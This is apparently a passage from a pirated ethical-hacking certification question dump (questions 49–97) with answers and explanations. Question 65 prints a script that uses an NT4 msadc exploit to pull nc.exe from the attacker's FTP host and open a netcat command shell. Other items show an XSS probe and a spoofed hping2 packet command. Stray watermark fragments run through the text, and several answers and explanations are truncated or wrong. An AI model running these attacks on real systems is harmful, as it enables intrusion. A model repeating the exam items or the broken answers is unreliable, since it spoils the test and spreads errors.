listed on a few Internet job-hunting sites. There are two jobs for network and system
lTe
administrators. How can this help you in footprinting the organization?
A. The IP range used by the target network

tua
B. An understanding of the number of employees in the company

C. The types of operating systems and applications being used
D. How strong the corporate security policy is
Ac
Answer: C
Explanation:
From job posting descriptions one can see which is the set of skills, technical knowledge, system
experience required, hence it is possible to argue what kind of operating systems and applications
the target organization is using.
QUESTION NO: 50
Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his
firewall to block password brute force attempts on his network. He enables blocking the intruder's
IP address for a period of 24 hours time after more than three unsuccessful attempts. He is
confident that this rule will secure his network from hackers on the Internet.

But he still receives hundreds of thousands brute-force attempts generated from various IP
addresses around the world. After some investigation he realizes that the intruders are using a
proxy somewhere else on the Internet which has been scripted to enable the random usage of
various proxies on each request so as not to get caught by the firewall rule.
Later he adds another rule to his firewall and enables small sleep on the password attempt so that
if the password is incorrect, it would take 45 seconds to return to the user to begin another
attempt. Since an intruder may use multiple machines to brute force the password, he also
throttles the number of connections that will be prepared to accept from a particular IP address.
This action will slow the intruder's attempts.
Samuel wants to completely block hackers brute force attempts on his network.
What are the alternatives to defending against possible brute-force password attacks on his site?
m
A. Enforce a password policy and use account lockouts after three wrong logon attempts even
though this might lock out legit users .co
B. You cannot completely block the intruders attempt if they constantly switch proxies
C. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of
sts
the intruder so that you can block them at the Firewall manually
D. Enforce complex password policy on your network so that passwords are more difficult to brute
force
lTe
Answer: B
tua
Explanation:
Without knowing from where the next attack will come there is no way of proactively block the
attack. This is becoming a increasing problem with the growth of large bot nets using ordinary
Ac
workstations and home computers in large numbers.
QUESTION NO: 51
Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge
cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator
from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to
verify her password with him ''just to double check our records.'' Jane does not suspect anything
amiss, and parts with her password. Jack can now access Brown Co.'s computers with a valid
user name and password, to steal the cookie recipe. What kind of attack is being illustrated here?
A. Faking Identity
B. Reverse Engineering

C. Social Engineering
D. Spoofing Identity
E. Reverse Psychology
Answer: C
Explanation:
This is a typical case of pretexting. Pretexting is the act of creating and using an invented scenario
(the pretext) to persuade a target to release information or perform an action and is usually done
over the telephone.
QUESTION NO: 52
Which of the following activities would not be considered passive footprinting?
m
A. Perform multiple queries through a search engine
B. Search on financial site such as Yahoo Financial
.co
C. Scan the range of IP address found in their DNS database
D. Go through the rubbish to find out any information that might have been discarded
sts
Answer: C
Explanation:
lTe
Passive footprinting is a method in which the attacker never makes contact with the target.
Scanning the targets IP addresses can be logged at the target and therefore contact has been
made.
tua
QUESTION NO: 53
Ac
An nmap command that includes the host specification of 202.176.56-57.* will scan _______
number of hosts.
A. 512
B. 256
C. 2
D. Over 10,000
Answer: A
Explanation:
The hosts with IP address 202.176.56.0-255 & 202.176.56.0-255 will be scanned (256+256=512)

QUESTION NO: 54
Hampton is the senior security analyst for the city of Columbus in Ohio. His primary responsibility
is to ensure that all physical and logical aspects of the city's computer network are secure from all
angles. Bill is an IT technician that works with Hampton in the same IT department. Bill's primary
responsibility is to keep PC's and servers up to date and to keep track of all the agency laptops
that the company owns and lends out to its employees. After Bill setup a wireless network for the
agency, Hampton made sure that everything was secure. He instituted encryption, rotating keys,
turned off SSID broadcasting, and enabled MAC filtering. According to agency policy, only
company laptops are allowed to use the wireless network, so Hampton entered all the MAC
addresses for those laptops into the wireless security utility so that only those laptops should be
able to access the wireless network.
Hampton does not keep track of all the laptops, but he is pretty certain that the agency only
purchases Dell laptops. Hampton is curious about this because he notices Bill working on a
m
Toshiba laptop one day and saw that he was on the Internet. Instead of jumping to conclusions,
Hampton decides to talk to Bill's boss and see if they had purchased a Toshiba laptop instead of
.co
the usual Dell. Bill's boss said no, so now Hampton is very curious to see how Bill is accessing the
Internet. Hampton does site surveys every couple of days, and has yet to see any outside wireless
network signals inside the company's building.
sts
How was Bill able to get Internet access without using an agency laptop?
lTe
A. Bill brute forced the Mac address ACLs

B. Toshiba and Dell laptops share the same hardware address
C. Bill connected to a Rogue access point
tua
D. Bill spoofed the MAC address of Dell laptop
Answer: C
Ac
QUESTION NO: 55
You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct
assesments to protect the company's network. During one of your periodic checks to see how well
policy is being observed by the employees, you discover an employee has attached a modem to
his telephone line and workstation. He has used this modem to dial in to his workstation, thereby
bypassing your firewall. A security breach has occurred as a direct result of this activity. The
employee explains that he used the modem because he had to download software for a
department project. How would you resolve this situation?
A. Enforce the corporate security policy

B. Conduct a needs analysis

C. Reconfigure the firewall
D. Install a network-based IDS
Answer: A
Explanation:
The security policy is meant to always be followed until changed. If a need rises to perform actions
that might violate the security policy you'll have to find another way to accomplish the task or wait
until the policy has been changed.
QUESTION NO: 56
What type of attack is shown in the above diagram?
m
.co
sts
lTe
tua
Ac
A. Man-in-the-Middle (MiTM) Attack

B. Session Hijacking Attack
C. SSL Spoofing Attack
D. Identity Stealing Attack
Answer: A
Explanation:
A man-in-the-middle attack ( MITM ) is an attack in which an attacker is able to read, insert and
modify at will, messages between two parties without either party knowing that the link between
them has been compromised.
QUESTION NO: 57
Bob has a good understanding of cryptography, having worked with it for many years.
Cryptography is used to secure data from specific threats, but it does not secure the application
from coding errors. It can provide data privacy; integrity and enable strong authentication but it
cannot mitigate programming errors. What is a good example of a programming error that Bob can
use to explain to the management how encryption will not address all their security concerns?
A. Bob can explain that using passwords to derive cryptographic keys is a form of a programming
error
B. Bob can explain that a buffer overflow is an example of programming error and it is a common
mistake associated with poor programming technique
C. Bob can explain that a random number generator can be used to derive cryptographic keys but
m
it uses a weak seed value and this is a form of a programming error
D. Bob can explain that using a weak key management technique is a form of programming error
Answer: B
.co
Explanation:
sts
A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed
length buffer and write at least one value outside that buffer's boundaries (usually past its end). A
lTe
buffer overflow can occur when reading input from the user into a buffer, but it can also occur
during other kinds of processing in a program. Technically, a buffer overflow is a problem with the
program's internal implementation.
tua
QUESTION NO: 58
Ac
You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't
get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any
information.
What should you do next?
A. Run NULL TCP hping2 against 192.168.1.10

B. The firewall is blocking all the scans to 192.168.1.10
C. Use NetScan Tools Pro to conduct the scan
D. Run nmap XMAS scan against 192.168.1.10
Answer: A

QUESTION NO: 59
You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to Cisco
router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and acknowledgement
numbers to successfully hijack the telnet session.
Take a look at the screenshot.
What are the next sequence and acknowledgement numbers that the router will send to the victim
machine?
Exhibit: 118-a.jpg
A. Sequence number: 82980010 Acknowledgement number: 17768885

B. Sequence number: 87000070 Acknowledgement number: 85320085
m
C. Sequence number: 82980070 Acknowledgement number: 17768885
D. Sequence number: 17768729 Acknowledgement number: 82980070
Answer: C
.co
sts
QUESTION NO: 60
lTe
An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't
want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful
in connecting to the system. The attacker rechecks that the target system is actually listening on
tua
Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target
system. What could be the reason?
A. He is attacking an operating system that does not reply to telnet even when open
Ac
B. He needs to use an automated tool to telnet in

C. He cannot spoof his IP and successfully use TCP
D. The firewall is blocking port 23 to that system
Answer: C
Explanation:
Spoofing your IP will only work if you don't need to get an answer from the target system. In this
case the answer (login prompt) from the telnet session will be sent to the "real" location of the IP
address that you are showing as the connection initiator.
QUESTION NO: 61

Attacker forges a TCP/IP packet, which causes the victim to try opening a connection with itself.
This causes the system to go into an infinite loop trying to resolve this unexpected connection.
Eventually, the connection times out, but during this resolution, the machine appears to hang or
become very slow. The attacker sends such packets on a regular basis to slow down the system.
Unpatched Windows XP and Windows Server 2003 machines are vulnerable to these attacks.
What type of Denial of Service attack is represented here?
A. SMURF Attacks
B. LAND attacks
C. Targa attacks
D. SYN Flood attacks
Answer: B
m
QUESTION NO: 62
.co
While testing web applications, you attempt to insert the following test script into the search area
on the company's web site:
sts
<script>alert('Testing Testing Testing')</script>

lTe
Afterwards, when you press the search button, a pop up box appears on your screen with the text
"Testing Testing Testing". What vulnerability is detected in the web application here?
tua
A. A buffer overflow
B. Password attacks
C. A hybrid attack
D. Cross Site Scripting
Ac
Answer: D
Explanation:
Cross-site scripting ( XSS ) is a type of computer security vulnerability typically found in web
applications which allow code injection by malicious web users into the web pages viewed by
other users. Examples of such code include HTML code and client-side scripts. An exploited
cross-site scripting vulnerability can be used by attackers to bypass access controls such as the
same origin policy.
QUESTION NO: 63

Study the snort rule given below and interpret the rule.
alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)
A. An alert is generated when a TCP packet originating from any IP address is seen on the
network and destined for any IP address on the 192.168.1.0 subnet on port 111
B. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet
and destined to any IP on port 111
C. An alert is generated when any packet other than a TCP packet is seen on the network and
destined for the 192.168.1.0 subnet
D. An alert is generated when a TCP packet is originated from port 111 of any IP address to the
192.168.1.0 subnet
Answer: A
Explanation:
m
Refer to the online documentation on creating Snort rules at
http://snort.org/docs/snort_htmanuals/htmanual_261/node147.html
.co
sts
QUESTION NO: 64
Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learned how
lTe
to use these tools in his lab and is now ready for real world exploitation. He was able to effectively
intercept communications between two entities and establish credentials with both sides of the
connections. The two remote ends of the communication never notice that Eric was relaying the
tua
information between the two. What would you call this attack?
A. Man-in-the-middle
B. Interceptor
Ac
C. Poisoning Attack
D. Arp Proxy
Answer: A
Explanation:
A man-in-the-middle attack ( MITM ) is an attack in which an attacker is able to read, insert and
modify at will, messages between two parties without either party knowing that the link between
them has been compromised.
QUESTION NO: 65
You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web
server. While it is effective, you find it tedious to perform extended functions. On further research
you come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");

system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
$o=<STDIN>; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
What kind of exploit is indicated by this script?
m
A. A buffer overflow exploit
B. A SUID exploit
C. A chained exploit
.co
D. A SQL injection exploit
sts
E. A buffer under run exploit
Answer: C
lTe
QUESTION NO: 66
tua
Sabotage, Advertising and Covering are the three stages of _____
A. Reverse Software Engineering

Ac
B. Social engineering
C. Reverse Social Engineering
D. Rapid Development Engineering
Answer: C
Explanation:
Typical social interaction dictates that if someone gives us something then it is only right for us to
return the favour. This is known as reverse social engineering, when an attacker sets up a
situation where the victim encounters a problem, they ask the attacker for help and once the
problem is solved the victim then feels obliged to give the information requested by the attacker.

QUESTION NO: 67
You are conducting an IdleScan manually using Hping2. During the scanning process, you notice
that almost every query increments the IPID - regardless of the port being queried. One or two of
the queries cause the IPID to increment by more than one value. Which of the following options
would be a possible reason?
A. Hping2 cannot be used for idlescanning

B. The zombie you are using is not truly idle
C. These ports are actually open on the target system
D. A stateful inspection firewall is resetting your queries
Answer: B
Explanation:
If the IPID is incremented by more than the normal increment for this type of system it means that
m
the system is interacting with some other system beside yours and has sent packets to an
unknown host between the packets destined for you.
.co
QUESTION NO: 68
sts
While performing ping scans into a target network you get a frantic call from the organization's
security team. They report that they are under a denial of service attack. When you stop your
lTe
scan, the smurf attack event stops showing up on the organization's IDS monitors. How can you
modify your scan to prevent triggering this event in the IDS?
tua
A. Only scan the Windows systems

B. Scan more slowly
C. Spoof the source IP address
Ac
D. Do not scan the broadcast IP
Answer: D
Explanation:
Scanning the broadcast address makes the scan target all IP addresses on that subnet at the
same time.
QUESTION NO: 69
While doing a penetration test, you discover that the organization is using one domain for web
publishing and another domain for administration and business operations. During what phase of
the penetration test would you normally discover this?

A. Active Attack
B. Port Scanning
C. Vulnerability Mapping
D. Passive Information Gathering
Answer: D
QUESTION NO: 70
Harold is the senior security analyst for a small state agency in New York.He has no other security
professionals that work under him, so he has to do all the security-related tasks for the
agency.Coming from a computer hardware background, Harold does not have a lot of experience
with security methodologies and technologies, but he was the only one who applied for the
position.
m
Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of
.co
traffic is being passed around, but the program he is using does not seem to be capturing
anything.He pours through the Sniffer's manual, but cannot find anything that directly relates to his
problem.Harold decides to ask the network administrator if he has any thoughts on the
sts
problem.Harold is told that the Sniffer was not working because the agency's network is a
switched network, which cannot be sniffed by some programs without some tweaking.
lTe
What technique could Harold use to sniff his agency's switched network?
A. Conduct MiTM against the switch

tua
B. Launch smurf attack against the switch

C. ARP spoof the default gateway
D. Flood the switch with ICMP packets
Ac
Answer: C
Explanation:
ARP spoofing , also known as ARP poisoning , is a technique used to attack an Ethernet network
which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic
altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or
'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses,
confusing network devices, such as network switches. As a result frames intended for one
machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable
host (a denial of service attack).
QUESTION NO: 71

The terrorist organizations are increasingly blocking all traffic from North America or from Internet
Protocol addresses that point back to users who rely on the English language.
Hackers sometimes set a number of criteria for accessing their website. This information is shared
among the co-hackers. For example if you are using a machine with the Linux operating system
and the Netscape browser then you will have access to their website in a covert way. When
federal investigators using PCs running Windows and using Internet Explorer visited the hackers'
shared site, the hackers' system immediately mounted a distributed denial-of-service attack
against the federal system.
Companies today are engaging in tracking competitors' through reverse IP address lookup sites
like whois.com, which provide an IP address's domain. When the competitor visits the companies
website they are directed to a products page without discount and prices are marked higher for
their product. When normal users visit the website they are directed to a page with full-blown
product details along with attractive discounts. This is based on IP-based blocking, where certain
m
addresses are barred from accessing a site.
What is this masking technique called?

.co
A. Website Filtering
sts
B. IP Access Blockade
C. Mirroring Website
D. Website Cloaking
lTe
Answer: D
tua
Explanation:
Website Cloaking travels under a variety of alias including Stealth, Stealth scripts, IP delivery,
Food Script, and Phantom page technology. It's hot- due to its ability to manipulate those elusive
Ac
top-ranking results from spider search engines.
QUESTION NO: 72
You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social
engineering, you know that they are enforcing strong passwords. You understand that all users
are required to use passwords that are at least 8 characters in length. All passwords must also
use 3 of the 4 following categories: lower case letters, capital letters, numbers and special
characters.
With your given knowledge of users, likely user account names and the possibility that they will
choose the easiest passwords possible, what would be the fastest type of password cracking
attack you can run against these hash values to get results?

A. Dictionary Attack
B. Hybrid Attack
C. Brute Force Attack
D. Encryption Attack
Answer: B
Explanation:
A dictionary attack will not work as strong passwords are enforced, also the minimum length of 8
characters in the password makes a brute force attack time consuming. A hybrid attack where you
take a word from a dictionary and exchange a number of letters with numbers and special
characters will probably be the fastest way to crack the passwords.
QUESTION NO: 73
m
Harold works for Jacobson Unlimited in the IT department as the security manager. Harold has
.co
created a security policy requiring all employees to use complex 14 character passwords.
Unfortunately, the members of management do not want to have to use such long complicated
passwords so they tell Harold's boss this new password policy should not apply to them. To
sts
comply with the management's wishes, the IT department creates another Windows domain and
moves all the management users to that domain. This new domain has a password policy only
requiring 8 characters.
lTe
Harold is concerned about having to accommodate the managers, but cannot do anything about it.
Harold is also concerned about using LanManager security on his network instead of NTLM or
tua
NTLMv2, but the many legacy applications on the network prevent using the more secure NTLM
and NTLMv2. Harold pulls the SAM files from the DC's on the original domain and the new domain
using Pwdump6.
Ac
Harold uses the password cracking software John the Ripper to crack users' passwords to make
sure they are strong enough.?Harold expects that the users' passwords in the original domain will
take much longer to crack than the management's passwords in the new domain. After running the
software, Harold discovers that the 14 character passwords only took a short time longer to crack
than the 8 character passwords.
Why did the 14 character passwords not take much longer to crack than the 8 character
passwords?
A. Harold should have used Dumpsec instead of Pwdump6

B. LanManger hashes are broken up into two 7 character fields
C. Harold should use LC4 instead of John the Ripper

D. Harold's dictionary file was not large enough
Answer: B
QUESTION NO: 74
Hping2 is a powerful packet crafter tool that can be used to penetrate firewalls by creating custom
TCP
What does the following command do?
CEH# hping2 -I eth0 -a 10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f

192.168.0.9
A. This command will generate a single TCP UDP packet with source port 1037, destination port
m
15, with a sequence number 22 spoofing the IP address 192.168.0.9
.co
B. This command will generate a multiple TCP SYN/ACK packets with source port 22, destination
port 1037, with a sequence number 19 spoofing the IP address 192.168.0.9
C. This command will generate multiple TCP SYN packets with source port 1037, destination port
sts
D. This command will generate a single TCP SYN packet with source port 1037, destination port
lTe
Answer: D
tua
QUESTION NO: 75
You are attempting to map out the firewall policy for an organization. You discover your target
Ac
system is one hop beyond the firewall. Using hping2, you send SYN packets with the exact TTL of
the target system starting at port 1 and going up to port 1024. What is this process known as?
A. Firewalking
B. Idle scanning
C. Footprinting
D. Enumeration
Answer: A
Explanation:
Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular
packet can pass from the attacker's host to a destination host through a packet-filtering device.
This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can
determine whether packets with various control information can pass through a given gateway.
QUESTION NO: 76
Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured
door and uses the special card in order to access the restricted area of the target company. Just
as the employee opens the door, Bob walks up to the employee (still holding the box) and asks the
employee to hold the door open so that he can enter. What is the best way to undermine the social
engineering activity of tailgating?
A. Post a sign that states, "no tailgating" next to the special card reader adjacent to the secured
door
B. Issue special cards to access secured doors at the company and provide a one-time only brief
description of use of the special card
C. Setup a mock video camera next to the special card reader adjacent to the secured door
m
D. Educate all of the employees of the company on best security practices on a regular, recurring
basis
Answer: D
.co
Explanation:
sts
Tailgating will not work in small company's where everyone knows everyone, and neither will it
work in very large companies where everyone is required to swipe a card to pass, but it's a very
lTe
simple and effective social engineering attack against mid-sized companies where it's common for
one employee not to know everyone. There is two ways of stop this attack either by buying
expensive perimeter defense in form of gates that only let on employee pass at every swipe of a
tua
card or by educating every employee on a recurring basis.

Ac
QUESTION NO: 77
Which of the following display filters will you enable in Ethereal to view the three-way handshake
for a connection from host 192.168.0.1?
A. ip.equals 192.168.0.1 and syn.equals on

B. ip.addr==192.168.0.1 and tcp.flags.syn
C. ip.addr = 192.168.0.1 and syn = 1
D. ip == 192.168.0.1 and tcp.syn
Answer: B
QUESTION NO: 78

You are scanning the target network for the first time. You are able to detect few conventional
open ports. While attempting to perform conventional service identification by connecting to the
open ports, the scan yields either bad or no results. As you are unsure of the protocols in use, you
want to discover as many different protocols as possible. Which of the following scan options can
help you achieve this?
A. Nmap scan with the P (Ping scan) switch

B. Nmap with the O (Raw IP packets) switch
C. Nessus scan with TCP based pings
D. Netcat scan with the switches
Answer: B
Explanation:
-sO IP protocol scans: This method is used to determine which IP protocols are supported on a
host. The technique is to send raw IP packets without any further protocol header to each
m
specified protocol on the target machine. If we receive an ICMP protocol unreachable
message, then the protocol is not in use. Otherwise we assume it is open. Note that some hosts
.co
(AIX, HP-UX, Digital UNIX) and firewalls may not send protocol unreachable messages.
sts
QUESTION NO: 79
lTe
You are footprinting the www.xsecurity.com domain using the Google search engine. You would
like to determine what sites link to www.xsecurity.com at the first level of relevance.
tua
Which of the following operator in Google search will you use to achieve this?
A. link:www.xsecurity.com
B. search?l:www.xsecurity.com
Ac
C. pagerank:www.xsecurity.com
D. level1:www.xsecurity.com
Answer: A
Explanation:
The query [link:] will list webpages that have links to the specified webpage. For instance,
[link:www.google.com] will list webpages that have links pointing to the Google homepage. Note
there can be no space between the "link:" and the web page url.
QUESTION NO: 80
The programmers on your team are analyzing the free, open source software being used to run
FTP services on a server in your organization. They notice that there is excessive number of
functions in the source code that might lead to buffer overflow. These C++
functions do not check bounds. Identify the line in the source code that might lead to buffer
overflow?
m
.co
sts
lTe
A. 20
tua
B. 9
C. 32
D. 35
Ac
E. 15
Answer: E
QUESTION NO: 81
The United Kingdom (UK) has passed a law that makes hacking into an unauthorized network a
felony.
The law states:
Section 1 of the Act refers to unauthorized access to computer material. This states that a person
commits an offence if he causes a computer to perform any function with intent to secure

unauthorized access to any program or data held in any computer. For a successful conviction
under this part of the Act, the prosecution must prove that the access secured is unauthorized and
that the suspect knew that this was the case. This section is designed to deal with common-or-
garden hacking.
Section 2 of the Act deals with unauthorized access with intent to commit or facilitate the
commission of further offences. An offence is committed under Section 2 if a Section 1 offence
has been committed and there is the intention of committing or facilitating a further offence (any
offence which attracts a custodial sentence of more than five years, not necessarily one covered
by the Act). Even if it is not possible to prove the intent to commit the further offence, the Section 1
offence is still committed.
Section 3 offences cover unauthorized modification of computer material, which generally means
the creation and distribution of viruses. For a conviction to succeed there must have been the
intent to cause the modification, and knowledge that the modification had not been authorized.
m
What is this law called?
A. Cyber Crime Law Act 2003

.co
B. Computer Incident Act 2000
sts
C. Computer Misuse Act 1990
D. Cyber Space Crime Act 1995
lTe
Answer: C
Explanation:
tua
Computer Misuse Act (1990) creates three criminal offences: Unauthorised access to computer
material Unauthorised access to a computer system with intent to commit or facilitate the
commission of a further offence Unauthorised modification of computer material
Ac
QUESTION NO: 82
While scanning a network you observe that all of the web servers in the DMZ are responding to
ACK packets on port 80. What can you infer from this observation?
A. They are using UNIX based web servers

B. They are using Windows based web servers
C. They are not using an Intrusion Detection System
D. They are not using a stateful inspection firewall
Answer: D

Explanation:
If they used a stateful inspection firewall this firewall would know if there has been a SYN-ACK
before the ACK.
QUESTION NO: 83
Clive is conducting a pen-test and has just port scanned a system on the network. He has
identified the operating system as Linux and been able to elicit responses from ports 23, 25 and
53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 as
running DNS service. The client confirms these findings and attests to the current availability of the
services. When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typing
other commands, he sees only blank spaces or underscores symbols on the screen. What are you
most likely to infer from this?
m
A. There is a honeypot running on the scanned machine
B. This indicates that the telnet and SMTP server have crashed
.co
C. An attacker has replaced the services with trojaned ones
D. The services are protected by TCP wrappers
sts
Answer: D
Explanation:
lTe
: TCP Wrapper is a host-based network ACL system, used to filter network access to Internet
protocol services run on (Unix-like) operating systems such as Linux or BSD. It allows host or
subnetwork IP addresses, names and/or ident query replies, to be used as tokens on which to
tua
filter for access control purposes.

Ac
QUESTION NO: 84
How does a denial-of-service attack work?
A. A hacker uses every character, word, or letter he or she can think of to defeat authentication
B. A hacker prevents a legitimate user (or group of users) from accessing a service
C. A hacker tries to decipher a password by using a system, which subsequently crashes the
network
D. A hacker attempts to imitate a legitimate user by confusing a computer or even another person
Answer: B
Explanation:
In computer security, a denial-of-service attack ( DoS attack ) is an attempt to make a computer
resource unavailable to its intended users. Typically the targets are high-profile web servers, and
the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer
crime that violates the Internet proper use policy as indicated by the Internet Architecture Board
(IAB).
QUESTION NO: 85
A digital signature is simply a message that is encrypted with the public key instead of the private
key.
A. True
B. False
Answer: B
Explanation:
Digital signatures enable the recipient of information to verify the authenticity of the information's
m
origin, and also verify that the information is intact. Thus, public key digital signatures provide
authentication and data integrity. A digital signature also provides non-repudiation, which means
.co
that it prevents the sender from claiming that he or she did not actually send the information.
Instead of encrypting information using someone else's public key, you encrypt it with your private
key. If the information can be decrypted with your public key, then it must have originated with you.
sts
lTe
QUESTION NO: 86
John is the network administrator for Frederickson Machinery in Tampa, Florida. Frederickson
Machinery has one large office, and a number of smaller offices spread out around the city. John's
tua
primary responsibility is to oversee the network equipment hat includes switches, routers,
gateways and firewalls. John is the only employee allowed to make any changes or troubleshoot
the network equipment so he has to run to any of the offices himself whenever there are any
Ac
network issues. John is becoming more and more busy, so he wants to be able to remotely
manage the network equipment as much as possible. He does not want to use telnet because of
its inherent security flaws, so he decides to use SSH. John downloads a program from the Internet
for SSH connections and attempts to connect to one of his routers at another office. After a short
time, the following screen pops up on his computer:
Why was John not able to connect?

A. He needs to turn off stateful inspection on his firewalls

B. He needs to open port 24 on his firewalls
C. He needs to open port 22 on his firewalls
m
D. Putty cannot make SSH connections
Answer: C .co
sts
QUESTION NO: 87
Snort is an open source Intrusion Detection System. However, it can also be used for a few other
lTe
purposes such as a sniffer. Which of the choices below are the proper features offered by Snort?
A. IDS, Packet Logger, Sniffer

tua
B. IDS, Sniffer, content inspector

C. IDS, Sniffer, Proxy
D. IDS, Firewall, Sniffer
Ac
Answer: A
Explanation:
Snort is a free software network intrusion detection and prevention system capable of performing
packet logging & real-time traffic analysis, on IP networks. Snort was written by Martin Roesch
but is now owned and developed by Sourcefire
QUESTION NO: 88
John wants to try a new hacking tool on his Linux system. As the application comes from a site in
his untrusted zone, John wants to ensure that the downloaded tool has not been Trojaned. Which
of the following options would indicate the best course of action for John?

A. Compare the file's virus signature with the one published on the distribution media
B. Compare the file's MD5 signature with the one published on the distribution media
C. Obtain the application via SSL
D. Obtain the application from a CD-ROM disc
Answer: B
Explanation:
MD5 was developed by Professor Ronald L. Rivest of MIT. What it does, to quote the executive
summary of rfc1321, is:
[The MD5 algorithm] takes as input a message of arbitrary length and produces as output a 128-
bit "fingerprint" or "message digest" of the input. It is conjectured that it is computationally
infeasible to produce two messages having the same message digest, or to produce any message
having a given prespecified target message digest. The MD5 algorithm is intended for digital
signature applications, where a large file must be "compressed" in a secure manner before being
m
encrypted with a private (secret) key under a public-key cryptosystem such as RSA.
In essence, MD5 is a way to verify data integrity, and is much more reliable than checksum and
many other commonly used methods. .co
sts
QUESTION NO: 89
An attacker has successfully compromised a remote computer. Which of the following comes as
lTe
one of the last steps that should be taken to ensure that the compromise cannot be traced back to
the source of the problem?
tua
A. Install patches
B. Setup a backdoor
C. Install a zombie for DDOS
D. Cover your tracks
Ac
Answer: D
Explanation:
As a hacker you don't want to leave any traces that could lead back to you.
QUESTION NO: 90
John is using a special tool on his Linux platform that has a database containing signatures to be
able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI scripts.
Moreover, the database detects DDoS zombies and Trojans as well. What would be the name of
this tool?

A. hping2
B. nessus
C. make
D. nmap
Answer: B
Explanation:
Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000
organizations world-wide. Nmap is mostly used for scanning, not for detecting vulnerabilities.
Hping is a free packet generator and analyzer for the TCP/IP protocol and make is used to
automatically build large applications on the *nix plattform.
QUESTION NO: 91
m
You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22.
What filter will you apply? .co
sts
lTe
tua
Ac
A. ip = 10.0.0.22
B. ip.equals 10.0.0.22
C. ip.address = 10.0.0.22
D. ip.src == 10.0.0.22
Answer: D
Explanation:

ip.src tells the filter to only show packets with 10.0.0.22 as the source.
QUESTION NO: 92
Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to
her. This time she envisages using a different kind of method to attack Brownies Inc. Eve tries to
forge the packets and uses the broadcast address. She launches an attack similar to that of
"fraggle". What is the technique that Eve used in the case above?
A. Ping of Death
B. Smurf
C. SYN Flood
D. Bubonic
Answer: B
m
Explanation:
.co
A fraggle attack is a variation of the smurf attack for denial of service in which the attacker sends
spoofed UDP packets instead of ICMP echo reply (ping) packets to the broadcast address of a
large network.
sts
lTe
QUESTION NO: 93
When referring to the Domain Name Service, what is a 'zone'?

tua
A. It is a collection of domains
B. It is the first resource record type in the SOA
C. It is the first domain that belong to a company
Ac
D. It is a collection of resource records
Answer: D
Explanation:
A reasonable definition of a zone would be a portion of the DNS namespace where responsibility
has been delegated .
QUESTION NO: 94
James is the lone IT technician for a small advertising agency in the Midwest. He oversees three
servers and fifteen workstations all running Windows operating systems. James just got back from
a Hacker Halted conference and is now very concerned about the security of his network.
Previously he thought that no one would be interested in his small company's data, but now he
thinks otherwise. His budget is very limited and he cannot afford any kind of commercial IDS or
IPS system.
James is looking for a freeware or easy-to-use open source program that will help him to detect
port scans on his workstations and servers.
What should James use?
A. GFI LANGuard
B. Snort
C. Nmap
D. Genius
Answer: B
m
QUESTION NO: 95
.co
What is the most common vehicle for social engineering attacks?
A. Direct in person
sts
B. Peer to Peer networks

C. Local Area Networks
lTe
D. Email
Answer: A
tua
Explanation:
Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target
to release information or perform an action and is usually done over the telephone.
Ac
QUESTION NO: 96
Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The
programmer makes an assumption that 200 characters are more than enough. Because there
were no proper boundary checks being conducted, Bob decided to insert 400 characters into the
200-character buffer. (Overflows the buffer). Below is the code snippet:
Void func (void)

{
int I; char buffer [200];
for (I=0; I<400; I++)
buffer [I]= 'A';

return;
}
How can you protect/fix the problem of your application as shown above?
A. Because the counter starts with 0, we would stop when the counter is more than 200
B. Add a separate statement to signify that if we have written 200 characters to the buffer, the
stack should stop because it cannot hold any more data
C. Add a separate statement to signify that if we have written less than 200 characters to the
buffer, the stack should stop because it cannot hold any more data
D. Because the counter starts with 0, we would stop when the counter is less than 200
Answer: B,D
Explanation:
I=199 would be the character number 200. The stack holds exact 200 characters so there is no
m
need to stop before 200.
.co
QUESTION NO: 97
sts
SSL has been seen as the solution to a lot of common security problems. Administrator will often
time make use of SSL to encrypt communications from points A to point B. Why do you think this
lTe
